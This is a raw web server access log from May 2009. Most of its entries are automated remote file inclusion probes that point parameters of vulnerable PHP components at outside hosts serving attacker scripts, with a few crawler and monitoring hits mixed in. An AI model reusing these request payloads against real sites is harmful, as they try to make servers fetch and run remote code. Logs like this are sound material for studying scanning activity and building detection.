70.89.181.197 - - [29/May/2009:05:36:29 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
211.234.100.126 - - [29/May/2009:05:36:37 -0400] "GET /logs/?sourcedir=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:36:40 -0400] "GET /?sourcedir=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:36:46 -0400] "GET //technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:36:46 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:36:46 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 360 "-" "Mozilla/5.0"
66.249.68.74 - - [29/May/2009:05:37:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L200C18446E415300A4DD058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.18.148.82 - - [29/May/2009:05:37:20 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:37:29 -0400] "GET /?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:37:29 -0400] "GET /logs/?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:37:29 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:38:06 -0400] "GET /logs/?sourcedir=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:38:07 -0400] "GET /?sourcedir=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:38:41 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:41:01 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:41:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.46.98.132 - - [29/May/2009:05:42:06 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.46.98.132 - - [29/May/2009:05:42:06 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
78.46.98.132 - - [29/May/2009:05:42:07 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.187.232.97 - - [29/May/2009:05:42:30 -0400] "GET /logs/access_log.Q109052200%20%20/?_zb_path=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:43:11 -0400] "GET /logs/access_log.Q109052300//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:43:20 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:43:20 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:43:20 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:46:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:05:48:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:48:40 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:48:40 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:48:45 -0400] "GET /logs/access_log.Q109052300%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:48:48 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:48:48 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:48:48 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
121.130.29.11 - - [29/May/2009:05:48:53 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX%5INCLUDE_PATH%5D=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.130.29.11 - - [29/May/2009:05:48:53 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX%5INCLUDE_PATH%5D=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [29/May/2009:05:49:05 -0400] "GET /?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.150.52.114 - - [29/May/2009:05:49:05 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.150.52.114 - - [29/May/2009:05:49:05 -0400] "GET /logs/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
212.150.52.114 - - [29/May/2009:05:49:05 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.130.29.11 - - [29/May/2009:05:49:08 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX%5INCLUDE_PATH%5D=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:51:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:05:51:44 -0400] "GET /logs/access_log.Q109052100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:51:52 -0400] "GET /logs/access_log.Q109052300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.27.203.107 - - [29/May/2009:05:52:59 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:52:59 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:52:59 -0400] "GET /logs/access_log.Q109052100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
121.130.29.11 - - [29/May/2009:05:53:01 -0400] "GET /logs/access_log.Q109051000/redaxo/include/addons/import_export/pages/index.inc.php?REX%5INCLUDE_PATH%5D=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:53:45 -0400] "GET //?path%5Bdocroot%5D=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:53:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:53:46 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:53:46 -0400] "GET /logs/access_log.Q109051000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:53:46 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:17 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:17 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:18 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
112.175.141.41 - - [29/May/2009:05:54:19 -0400] "GET /logs/access_log.Q109051000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:21 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:21 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:54:21 -0400] "GET /logs/access_log.Q109051000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:54:50 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:55:07 -0400] "GET /logs/access_log.Q109052200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.51.152.234 - - [29/May/2009:05:56:05 -0400] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
209.59.12.99 - - [29/May/2009:05:56:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [29/May/2009:05:56:23 -0400] "GET /logs/error_log.Q108052600//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 291 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:56:29 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:56:29 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:56:29 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
112.175.141.41 - - [29/May/2009:05:56:44 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.234.100.126 - - [29/May/2009:05:56:44 -0400] "GET //?path%5Bdocroot%5D=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:56:44 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.khcroquis.net/Article//include/nanta/1.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:56:46 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
218.27.203.107 - - [29/May/2009:05:57:26 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
209.51.152.234 - - [29/May/2009:05:57:36 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
209.51.152.234 - - [29/May/2009:05:57:37 -0400] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
209.51.152.234 - - [29/May/2009:05:57:37 -0400] "GET /logs//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 200 3299 "-" "libwww-perl/5.811"
201.134.110.45 - - [29/May/2009:05:57:58 -0400] "GET /logs/access_log.Q109051700%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:57:58 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:57:58 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:58:37 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
112.175.141.41 - - [29/May/2009:05:58:43 -0400] "GET /logs/error_log.Q108052600//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
218.27.203.107 - - [29/May/2009:05:58:44 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.27.203.107 - - [29/May/2009:05:59:02 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
221.139.104.104 - - [29/May/2009:05:59:05 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:59:05 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:59:05 -0400] "GET /logs/access_log.Q109052300//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:59:31 -0400] "GET /logs/access_log.Q109051000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:06:00:30 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.51.152.234 - - [29/May/2009:06:00:44 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid1.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
209.59.12.99 - - [29/May/2009:06:01:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.134.110.45 - - [29/May/2009:06:01:24 -0400] "GET /logs/error_log.Q108051600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.99.192.2 - - [29/May/2009:06:01:42 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://66.7.56.125/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
65.99.192.2 - - [29/May/2009:06:01:42 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://66.7.56.125/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
200.87.126.118 - - [29/May/2009:06:01:53 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.87.126.118 - - [29/May/2009:06:01:53 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
112.175.141.41 - - [29/May/2009:06:03:00 -0400] "GET /logs/access_log.Q109021500//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
210.48.71.198 - - [29/May/2009:06:03:05 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://66.7.56.125/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
210.48.71.198 - - [29/May/2009:06:03:05 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://66.7.56.125/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
201.232.54.48 - - [29/May/2009:06:03:17 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_patch=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:03:17 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_patch=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:03:17 -0400] "GET /logs/access_log.Q109051600/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_patch=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:06:03:26 -0400] "GET /logs/access_log.Q109052300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
112.175.141.41 - - [29/May/2009:06:03:30 -0400] "GET /logs/error_log.Q108111700/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.18.148.82 - - [29/May/2009:06:04:36 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:04:36 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:06:04:36 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:06:04:55 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:06:05:05 -0400] "GET /logs/error_log.Q109011800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
220.181.7.97 - - [29/May/2009:06:05:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.11.230.36 - - [29/May/2009:06:06:06 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:06:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:06:06:07 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:06:21 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:06:21 -0400] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:06:21 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:06:56 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_patch=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.11.230.36 - - [29/May/2009:06:07:21 -0400] "GET /logs/error_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:06:08:26 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
